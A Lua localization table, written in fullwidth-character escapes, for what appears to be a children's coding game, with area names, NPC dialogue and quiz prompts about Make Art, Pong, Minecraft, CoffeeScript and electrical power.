["lakeArea"] = "\239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\172\239\189\129\239\189\139\239\189\133",
["portetherDoor3"] = "404 - \239\188\174\239\189\143\239\189\148 \239\189\134\239\189\143\239\189\149\239\189\142\239\189\132",
["sharesHelp1"] = "\239\188\166\239\189\137\239\189\142\239\189\132 \239\188\164\239\189\133\239\189\150\239\188\175\239\189\144\239\189\147 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\188\173\239\189\149\239\189\147\239\189\133\239\189\149\239\189\141.",
["sharesHelp2"] = "\239\188\163\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\143\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\133\239\189\146\239\189\150\239\189\133\239\189\146\239\189\147 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\130\239\189\129\239\189\147\239\189\133\239\189\141\239\189\133\239\189\142\239\189\148 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148.",
["sharesHelp3"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\164\239\189\133\239\189\150\239\188\175\239\189\144\239\189\147.",
["sharesHelp4"] = "\239\188\179\239\189\136\239\189\129\239\189\146\239\189\133 3 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\188\163\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147.",
["sharesHelp5"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\164\239\189\133\239\189\150\239\188\175\239\189\144\239\189\147.",
["powerQuest2"] = "\239\188\183\239\189\136\239\189\153 \239\189\132\239\189\143\239\189\142'\239\189\148 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\143\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\133 \239\188\172\239\188\165\239\188\164 \239\189\143\239\189\150\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133?",
["powerQuest3"] = "\239\188\176\239\189\146\239\189\133\239\189\148\239\189\148\239\189\153 \239\189\130\239\189\146\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\137\239\189\147\239\189\142'\239\189\148 \239\189\137\239\189\148? \239\188\162\239\189\153 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\129\239\189\153, \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\151\239\189\129\239\189\147 \239\189\129\239\189\142 \239\189\133\239\189\142\239\189\133\239\189\146\239\189\135\239\189\133\239\189\148\239\189\137\239\189\131 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\130\239\189\143\239\189\149\239\189\142\239\189\131\239\189\137\239\189\142\239\189\135 \239\189\129\239\189\146\239\189\143\239\189\149\239\189\142\239\189\132. \239\188\169 \239\189\132\239\189\143\239\189\142'\239\189\148 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\139 \239\189\137\239\189\148 \239\189\132\239\189\137\239\189\132 \239\189\129\239\189\142\239\189\153\239\189\148\239\189\136\239\189\137\239\189\142\239\189\135, \239\189\130\239\189\149\239\189\148 \239\189\137\239\189\148 \239\189\132\239\189\143\239\189\133\239\189\147 \239\189\147\239\189\133\239\189\133\239\189\141 \239\189\141\239\189\137\239\189\147\239\189\131\239\189\136\239\189\137\239\189\133\239\189\150\239\189\143\239\189\149\239\189\147. \239\188\169 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\139 \239\189\137\239\189\148 \239\189\136\239\189\133\239\189\129\239\189\132\239\189\133\239\189\132 \239\189\148\239\189\143\239\189\151\239\189\129\239\189\146\239\189\132\239\189\147 \239\189\148\239\189\136\239\189\133 \239\188\168\239\188\164\239\188\173\239\188\169 \239\189\144\239\189\143\239\189\146\239\189\148.",
["cSDCardTitle"] = "\239\188\179\239\188\164 \239\188\163\239\189\129\239\189\146\239\189\132",
["cCoffeeScriptTitle"] = "\239\188\163\239\189\143\239\189\134\239\189\134\239\189\133\239\189\133\239\188\179\239\189\131\239\189\146\239\189\137\239\189\144\239\189\148",
["House01Boy"] = "\239\188\168\239\189\133\239\189\153\239\189\129! \239\188\166\239\189\133\239\189\133\239\189\140 \239\189\134\239\189\146\239\189\133\239\189\133 \239\189\148\239\189\143 \239\189\131\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\143\239\189\149\239\189\148 \239\189\143\239\189\149\239\189\146 \239\189\130\239\189\143\239\189\143\239\189\139\239\189\147\239\189\136\239\189\133\239\189\140\239\189\134. \239\188\183\239\189\133 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\129 \239\189\144\239\189\146\239\189\133\239\189\148\239\189\148\239\189\153 \239\189\135\239\189\143\239\189\143\239\189\132 \239\189\131\239\189\143\239\189\140\239\189\140\239\189\133\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142.",
["House02Boy"] = "\239\188\173\239\189\153 \239\189\147\239\189\137\239\189\147\239\189\148\239\189\133\239\189\146 \239\189\137\239\189\147 \239\189\131\239\189\136\239\189\137\239\189\140\239\189\140\239\189\137\239\189\142\239\189\135 \239\189\143\239\189\142 \239\188\179\239\188\164 \239\189\130\239\189\133\239\189\129\239\189\131\239\189\136. \239\188\169 \239\189\139\239\189\133\239\189\133\239\189\144 \239\189\148\239\189\133\239\189\140\239\189\140\239\189\137\239\189\142\239\189\135 \239\189\136\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\129\239\189\148 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\137\239\189\147 \239\189\151\239\189\129\239\189\153 \239\189\130\239\189\133\239\189\148\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\129\239\189\142 \239\188\176\239\189\143\239\189\142\239\189\135, \239\189\130\239\189\149\239\189\148 \239\189\147\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\142'\239\189\148 \239\189\140\239\189\137\239\189\147\239\189\148\239\189\133\239\189\142. \239\188\168\239\189\129\239\189\150\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\133\239\189\150\239\189\133\239\189\146 \239\189\132\239\189\146\239\189\129\239\189\151\239\189\142 \239\189\147\239\189\143\239\189\141\239\189\133\239\189\148\239\189\136\239\189\137\239\189\142\239\189\135 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\130\239\189\133\239\189\134\239\189\143\239\189\146\239\189\133?",
["rivalKid"] = "\239\188\178\239\189\137\239\189\150\239\189\129\239\189\140",
["devTom"] = "\239\188\169'\239\189\141 \239\189\129 \239\189\141\239\189\129\239\189\148\239\189\136\239\189\141\239\189\129\239\189\148\239\189\137\239\189\131\239\189\137\239\189\129\239\189\142 \239\189\148\239\189\149\239\189\146\239\189\142\239\189\133\239\189\132 \239\189\144\239\189\146\239\189\143\239\189\135\239\189\146\239\189\129\239\189\141\239\189\141\239\189\133\239\189\146 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\129 \239\189\144\239\189\129\239\189\147\239\189\147\239\189\137\239\189\143\239\189\142 \239\189\134\239\189\143\239\189\146 \239\189\144\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\189\129\239\189\142\239\189\132 \239\189\129 \239\189\131\239\189\146\239\189\129\239\189\150\239\189\137\239\189\142\239\189\135 \239\189\134\239\189\143\239\189\146 \239\188\163. \239\188\175\239\189\136 \239\189\141\239\189\153!",
["minesentranceArea"] = "\239\188\162\239\189\140\239\189\143\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\147 \239\188\165\239\189\142\239\189\148\239\189\146\239\189\129\239\189\142\239\189\131\239\189\133",
["rivalKidDiag3"] = "\239\188\175\239\189\136! \239\188\185\239\189\143\239\189\149\239\189\146 \239\189\131\239\189\149\239\189\146\239\189\146\239\189\133\239\189\142\239\189\148 \239\189\136\239\189\137\239\189\135\239\189\136 \239\189\147\239\189\131\239\189\143\239\189\146\239\189\133 \239\189\137\239\189\147 $1. \239\188\180\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\144\239\189\146\239\189\133\239\189\148\239\189\148\239\189\153 \239\189\137\239\189\141\239\189\144\239\189\146\239\189\133\239\189\147\239\189\147\239\189\137\239\189\150\239\189\133.",
["makeArtQuestComplete2"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133\239\189\132 \239\189\130\239\189\129\239\189\147\239\189\137\239\189\131 \239\189\129\239\189\142\239\189\132 \239\189\141\239\189\133\239\189\132\239\189\137\239\189\149\239\189\141 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148.",
["rivalKidDiag4"] = "\239\188\183\239\188\175\239\188\183! \239\188\185\239\189\143\239\189\149\239\189\146 \239\189\131\239\189\149\239\189\146\239\189\146\239\189\133\239\189\142\239\189\148 \239\189\136\239\189\137\239\189\135\239\189\136 \239\189\147\239\189\131\239\189\143\239\189\146\239\189\133 \239\189\137\239\189\147 $1. \239\188\185\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\135\239\189\143\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\143\239\189\140, \239\189\131\239\189\129\239\189\140\239\189\141, \239\189\140\239\189\143\239\189\135\239\189\137\239\189\131\239\189\129\239\189\140 \239\189\134\239\189\140\239\189\153\239\189\137\239\189\142\239\189\135 \239\189\142\239\189\129\239\189\137\239\189\140\239\189\133\239\189\132.",
["Tilde"] = "\239\188\180\239\189\137\239\189\140\239\189\132\239\189\133",
["cOSTitle"] = "\239\188\175\239\188\179 (\239\188\175\239\189\144\239\189\133\239\189\146\239\189\129\239\189\148\239\189\137\239\189\142\239\189\135 \239\188\179\239\189\153\239\189\147\239\189\148\239\189\133\239\189\141)",
["powerCurrent"] = "\239\188\185\239\189\143\239\189\149 \239\189\147\239\189\133\239\189\133 \239\189\132\239\189\146\239\189\129\239\189\151\239\189\137\239\189\142\239\189\135\239\189\147 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\134\239\189\140\239\189\143\239\189\151 \239\189\143\239\189\134 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\137\239\189\131\239\189\137\239\189\148\239\189\153 \239\189\148\239\189\136\239\189\146\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146, \239\189\129\239\189\142\239\189\132 \239\189\129 \239\189\142\239\189\143\239\189\148\239\189\133 \239\189\147\239\189\129\239\189\153\239\189\137\239\189\142\239\189\135: \239\188\163\239\189\149\239\189\146\239\189\146\239\189\133\239\189\142\239\189\148 \239\189\137\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\129\239\189\148\239\189\133 \239\189\129\239\189\148 \239\189\151\239\189\136\239\189\137\239\189\131\239\189\136 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\137\239\189\131\239\189\129\239\189\140 \239\189\131\239\189\136\239\189\129\239\189\146\239\189\135\239\189\133 \239\189\137\239\189\147 \239\189\148\239\189\146\239\189\129\239\189\142\239\189\147\239\189\134\239\189\133\239\189\146\239\189\146\239\189\133\239\189\132.",
["makeArtQuiz2"] = "\239\188\174\239\189\137\239\189\131\239\189\133 \239\189\143\239\189\142\239\189\133! \239\188\168\239\189\143\239\189\151 \239\189\132\239\189\143 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\129 \239\189\146\239\189\133\239\189\131\239\189\148\239\189\129\239\189\142\239\189\135\239\189\140\239\189\133 \239\189\143\239\189\134 \239\189\151\239\189\137\239\189\132\239\189\148\239\189\136 20 \239\189\129\239\189\142\239\189\132 \239\189\136\239\189\133\239\189\137\239\189\135\239\189\136\239\189\148 40?",
["makeArtQuiz3"] = "\239\188\167\239\189\146\239\189\133\239\189\129\239\189\148 \239\189\151\239\189\143\239\189\146\239\189\139! \239\188\166\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\145\239\189\149\239\189\133\239\189\147\239\189\148\239\189\137\239\189\143\239\189\142: \239\188\169 \239\189\151\239\189\129\239\189\142\239\189\148 \239\189\148\239\189\143 \239\189\141\239\189\143\239\189\150\239\189\133 \239\189\129\239\189\142 \239\189\143\239\189\130\239\189\138\239\189\133\239\189\131\239\189\148 \239\189\146\239\189\133\239\189\140\239\189\129\239\189\148\239\189\137\239\189\150\239\189\133 \239\189\148\239\189\143 \239\189\129\239\189\142\239\189\143\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\143\239\189\130\239\189\138\239\189\133\239\189\131\239\189\148. \239\188\183\239\189\136\239\189\137\239\189\131\239\189\136 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132 \239\189\147\239\189\136\239\189\143\239\189\149\239\189\140\239\189\132 \239\188\169 \239\189\149\239\189\147\239\189\133?",
["makeArtQuiz1"] = "\239\188\168\239\189\143\239\189\151 \239\189\132\239\189\143 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\129\239\189\142 \239\189\143\239\189\130\239\189\138\239\189\133\239\189\131\239\189\148 \239\189\148\239\189\143 \239\189\130\239\189\133 \239\189\153\239\189\133\239\189\140\239\189\140\239\189\143\239\189\151?",
["cPower"] = "\239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\189\137\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\129\239\189\148\239\189\133 \239\189\129\239\189\148 \239\189\151\239\189\136\239\189\137\239\189\131\239\189\136 \239\189\133\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153 \239\189\137\239\189\147 \239\189\131\239\189\143\239\189\142\239\189\150\239\189\133\239\189\146\239\189\148\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\129\239\189\142\239\189\143\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\134\239\189\143\239\189\146\239\189\141, \239\189\147\239\189\149\239\189\131\239\189\136 \239\189\129\239\189\147 \239\189\141\239\189\143\239\189\148\239\189\137\239\189\143\239\189\142, \239\189\136\239\189\133\239\189\129\239\189\148, \239\189\143\239\189\146 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\137\239\189\131\239\189\129\239\189\140. \239\188\169\239\189\148 \239\189\137\239\189\147 \239\189\141\239\189\133\239\189\129\239\189\147\239\189\149\239\189\146\239\189\133\239\189\132 \239\189\137\239\189\142 \239\188\183\239\189\129\239\189\148\239\189\148\239\189\147.",
["coming"] = "\239\188\163\239\189\143\239\189\141\239\189\137\239\189\142\239\189\135 \239\188\179\239\189\143\239\189\143\239\189\142...",
["completedQuests"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133\239\189\132 \239\188\177\239\189\149\239\189\133\239\189\147\239\189\148\239\189\147",
["jungleTildeQuestTitle"] = "\239\188\179\239\189\144\239\189\133\239\189\140\239\189\140\239\189\147 \239\189\137\239\189\142 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\188\170\239\189\149\239\189\142\239\189\135\239\189\140\239\189\133",
["blank"] = " ",
["minesDojoWoman"] = "\239\188\173\239\189\153 \239\189\134\239\189\129\239\189\150\239\189\143\239\189\146\239\189\137\239\189\148\239\189\133 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146 \239\189\137\239\189\142 \239\188\168\239\189\129\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\131\239\189\146\239\189\129\239\189\134\239\189\148 \239\189\137\239\189\147 \239\188\168\239\189\143\239\189\140\239\189\133\239\189\153 \239\188\173\239\189\143\239\189\140\239\189\133\239\189\153. \239\188\169 \239\189\140\239\189\143\239\189\150\239\189\133 \239\189\132\239\189\137\239\189\135\239\189\135\239\189\137\239\189\142\239\189\135 \239\189\136\239\189\143\239\189\140\239\189\133\239\189\147 \239\189\147\239\189\149\239\189\144\239\189\133\239\189\146 \239\189\145\239\189\149\239\189\137\239\189\131\239\189\139!",
["mrPongDiag2"] = "\239\188\162\239\189\143\239\189\143! \239\188\173\239\189\129\239\189\153\239\189\130\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\147\239\189\136\239\189\143\239\189\149\239\189\140\239\189\132 \239\189\135\239\189\143 \239\189\129\239\189\142\239\189\132 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\133 \239\188\161\239\189\146\239\189\148 \239\188\173\239\189\149\239\189\147\239\189\133\239\189\149\239\189\141 \239\189\137\239\189\142\239\189\147\239\189\148\239\189\133\239\189\129\239\189\132.",
["minesArea"] = "\239\188\162\239\189\140\239\189\143\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\147",
["tempLaunchUpdater"] = "\239\188\172\239\189\129\239\189\149\239\189\142\239\189\131\239\189\136 \239\188\181\239\189\144\239\189\132\239\189\129\239\189\148\239\189\133\239\189\146",
["mrPongDiag1"] = "\239\188\176\239\189\143\239\189\142\239\189\135. \239\188\176\239\189\143\239\189\142\239\189\135. \239\188\176\239\189\143\239\189\142\239\189\135. \239\188\169 \239\189\140\239\189\143\239\189\150\239\189\133 \239\188\176\239\189\143\239\189\142\239\189\135. \239\188\166\239\189\129\239\189\142\239\189\131\239\189\153 \239\189\129 \239\189\135\239\189\129\239\189\141\239\189\133? \239\188\175\239\189\146 \239\189\133\239\189\150\239\189\133\239\189\142 \239\189\130\239\189\133\239\189\148\239\189\148\239\189\133\239\189\146, \239\189\141\239\189\129\239\189\139\239\189\133 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\143\239\189\151\239\189\142?",
["makeMusicTerminal1"] = "\239\188\163\239\189\143\239\189\132\239\189\133 \239\189\129 \239\189\147\239\189\143\239\189\142\239\189\135 \239\189\151\239\189\137\239\189\148\239\189\136 \239\188\179\239\189\143\239\189\142\239\189\137\239\189\131 \239\188\176\239\189\137?",
["llPupil"] = "\239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\149\239\189\147\239\189\133 \239\189\131\239\189\143\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\140\239\189\129\239\189\142\239\189\135\239\189\149\239\189\129\239\189\135\239\189\133\239\189\147 \239\189\148\239\189\143 \239\189\131\239\189\136\239\189\129\239\189\142\239\189\135\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\149\239\189\140\239\189\133\239\189\147 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146.",
["powerQuestTitle"] = "\239\188\180\239\189\136\239\189\133 \239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\176\239\189\143\239\189\146\239\189\148",
["audioJack"] = "\239\188\185\239\189\143, \239\189\151\239\189\133\239\189\140\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\179\239\189\143\239\189\149\239\189\142\239\189\132 \239\188\176\239\189\143\239\189\146\239\189\148. \239\188\183\239\189\136\239\189\129\239\189\148 \239\189\132\239\189\143 \239\189\153\239\189\143\239\189\149 \239\189\151\239\189\129\239\189\142\239\189\148 \239\189\148\239\189\143 \239\189\148\239\189\129\239\189\140\239\189\139 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148?",
["portetherMayorQuestTitle"] = "\239\188\164\239\189\129\239\189\148\239\189\129 \239\189\131\239\189\143\239\189\146\239\189\146\239\189\149\239\189\144\239\189\148\239\189\137\239\189\143\239\189\142",
["cSoundWaveTitle"] = "\239\188\179\239\189\143\239\189\149\239\189\142\239\189\132 \239\188\183\239\189\129\239\189\150\239\189\133",
["portetherDancer"] = "\239\188\164\239\189\137\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\147\239\189\133\239\189\133 \239\189\129 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\130\239\189\143\239\189\149\239\189\142\239\189\131\239\189\137\239\189\142\239\189\135 \239\189\129\239\189\146\239\189\143\239\189\149\239\189\142\239\189\132?",
["square"] = "\239\188\179\239\189\145\239\189\149\239\189\129\239\189\146\239\189\133",
["completed"] = "\239\189\131\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133\239\189\132",
["sunburntDiag0"] = "\239\188\169\239\189\148'\239\189\147 \239\189\141\239\189\153 \239\189\134\239\189\137\239\189\146\239\189\147\239\189\148 \239\189\148\239\189\137\239\189\141\239\189\133 \239\189\129\239\189\148 \239\188\179\239\188\164 \239\188\162\239\189\133\239\189\129\239\189\131\239\189\136 \239\189\148\239\189\143\239\189\143. \239\188\181\239\189\142\239\189\132\239\189\133\239\189\146 \239\189\143\239\189\149\239\189\146 \239\189\134\239\189\133\239\189\133\239\189\148 \239\189\129\239\189\146\239\189\133 \239\189\129\239\189\140\239\189\140 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146'\239\189\147 \239\189\141\239\189\133\239\189\141\239\189\143\239\189\146\239\189\137\239\189\133\239\189\147.",
["momaArtCritic2"] = "\239\188\161\239\189\136... \239\188\180\239\189\136\239\189\137\239\189\147 \239\189\144\239\189\137\239\189\133\239\189\131\239\189\133 \239\189\137\239\189\147 \239\189\131\239\189\129\239\189\140\239\189\140\239\189\133\239\189\132 \239\188\176\239\189\133\239\189\146\239\189\140\239\189\137\239\189\142 \239\188\174\239\189\143\239\189\137\239\189\147\239\189\133. \239\188\169\239\189\148'\239\189\147 \239\189\141\239\189\129\239\189\132\239\189\133 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\129\239\189\142 \239\189\129\239\189\140\239\189\135\239\189\143\239\189\146\239\189\137\239\189\148\239\189\136\239\189\141. \239\188\180\239\189\136\239\189\133 \239\189\147\239\189\129\239\189\141\239\189\133 \239\189\143\239\189\142\239\189\133 \239\189\149\239\189\147\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\133 \239\189\144\239\189\129\239\189\148\239\189\148\239\189\133\239\189\146\239\189\142\239\189\147 \239\189\137\239\189\142 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\131\239\189\146\239\189\129\239\189\134\239\189\148 \239\189\130\239\189\140\239\189\143\239\189\131\239\189\139\239\189\147.",
["mines01Sign"] = "\239\188\162\239\189\140\239\189\143\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\147 - \239\189\134\239\189\143\239\189\146 \239\189\141\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146 \239\189\130\239\189\149\239\189\137\239\189\140\239\189\132\239\189\133\239\189\146\239\189\147 \239\189\143\239\189\142\239\189\140\239\189\153",
["wasFun"] = "\239\188\180\239\189\136\239\189\129\239\189\148 \239\189\151\239\189\129\239\189\147 \239\189\134\239\189\149\239\189\142!",
["cVector"] = "\239\188\180\239\189\136\239\189\133 \239\189\149\239\189\147\239\189\133 \239\189\143\239\189\134 \239\189\144\239\189\143\239\189\140\239\189\153\239\189\135\239\189\143\239\189\142\239\189\147 \239\189\148\239\189\143 \239\189\146\239\189\133\239\189\144\239\189\146\239\189\133\239\189\147\239\189\133\239\189\142\239\189\148 \239\189\137\239\189\141\239\189\129\239\189\135\239\189\133\239\189\147 \239\189\137\239\189\142 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\135\239\189\146\239\189\129\239\189\144\239\189\136\239\189\137\239\189\131\239\189\147.",
["jungleWildBoy"] = "\239\188\180\239\189\136\239\189\133 \239\188\162\239\189\140\239\189\143\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\147 \239\189\129\239\189\146\239\189\133 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\137\239\189\135\239\189\136\239\189\148. \239\188\165\239\189\152\239\189\144\239\189\140\239\189\143\239\189\146\239\189\133 \239\189\148\239\189\136\239\189\133\239\189\141 \239\189\148\239\189\143 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\131\239\189\146\239\189\129\239\189\134\239\189\148 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146.",
["cPixels"] = "\239\188\180\239\189\136\239\189\133 \239\189\130\239\189\129\239\189\147\239\189\137\239\189\131 \239\189\149\239\189\142\239\189\137\239\189\148 \239\189\143\239\189\134 \239\189\131\239\189\143\239\189\140\239\189\143\239\189\146 \239\189\143\239\189\142 \239\189\129 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\132\239\189\137\239\189\147\239\189\144\239\189\140\239\189\129\239\189\153. \239\188\180\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\140\239\189\143\239\189\146\239\189\147 \239\189\129\239\189\146\239\189\133 \239\189\141\239\189\129\239\189\132\239\189\133 \239\189\149\239\189\144 \239\189\143\239\189\134 \239\189\132\239\189\137\239\189\134\239\189\134\239\189\133\239\189\146\239\189\133\239\189\142\239\189\148 \239\189\150\239\189\129\239\189\140\239\189\149\239\189\133\239\189\147 \239\189\143\239\189\134 \239\189\146\239\189\133\239\189\132, \239\189\135\239\189\146\239\189\133\239\189\133\239\189\142 \239\189\129\239\189\142\239\189\132 \239\189\130\239\189\140\239\189\149\239\189\133.",
["vertex1"] = "\239\188\163\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\143 \239\189\132\239\189\143 \239\189\141\239\189\143\239\189\146\239\189\133 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148! \239\188\169 \239\189\147\239\189\133\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\129\239\189\146\239\189\133 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 $1 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\141\239\189\133\239\189\132\239\189\137\239\189\149\239\189\141 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147.",
["makeArtQuiz2a"] = "\239\189\146\239\189\133\239\189\131\239\189\148\239\189\129\239\189\142\239\189\135\239\189\140\239\189\133 20, 40",
["makeArtQuiz2b"] = "\239\189\146\239\189\133\239\189\131\239\189\148\239\189\129\239\189\142\239\189\135\239\189\140\239\189\133 40, 20",
["villageArea"] = "\239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133",
["cCoffeeScript"] = "\239\188\163\239\189\143\239\189\134\239\189\134\239\189\133\239\189\133\239\188\179\239\189\131\239\189\146\239\189\137\239\189\144\239\189\148 \239\189\137\239\189\147 \239\189\129 \239\189\140\239\189\129\239\189\142\239\189\135\239\189\149\239\189\129\239\189\135\239\189\133 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\137\239\189\140\239\189\133\239\189\147 \239\189\137\239\189\142\239\189\148\239\189\143 \239\188\170\239\189\129\239\189\150\239\189\129\239\188\179\239\189\131\239\189\146\239\189\137\239\189\144\239\189\148. \239\188\169\239\189\148 \239\189\151\239\189\129\239\189\147 \239\189\132\239\189\133\239\189\147\239\189\137\239\189\135\239\189\142\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\149\239\189\147\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\135\239\189\143\239\189\143\239\189\132 \239\189\144\239\189\129\239\189\146\239\189\148\239\189\147 \239\189\143\239\189\134 \239\188\170\239\189\129\239\189\150\239\189\129\239\188\179\239\189\131\239\189\146\239\189\137\239\189\144\239\189\148 \239\189\137\239\189\142 \239\189\129 \239\189\147\239\189\137\239\189\141\239\189\144\239\189\140\239\189\133 \239\189\151\239\189\129\239\189\153 \239\189\147\239\189\143 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\137\239\189\147 \239\189\137\239\189\147 \239\189\133\239\189\129\239\189\147\239\189\137\239\189\133\239\189\146 \239\189\148\239\189\143 \239\189\149\239\189\147\239\189\133.",
["hdmiInterviewWelcome"] = "\239\188\168\239\189\133\239\189\140\239\189\140\239\189\143, \239\189\151\239\189\143\239\189\149\239\189\140\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\130\239\189\133 \239\189\151\239\189\137\239\189\140\239\189\140\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\129\239\189\142 \239\189\137\239\189\142\239\189\148\239\189\133\239\189\146\239\189\150\239\189\137\239\189\133\239\189\151 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\146\239\189\133\239\189\131\239\189\133\239\189\142\239\189\148 \239\189\133\239\189\150\239\189\133\239\189\142\239\189\148\239\189\147?",
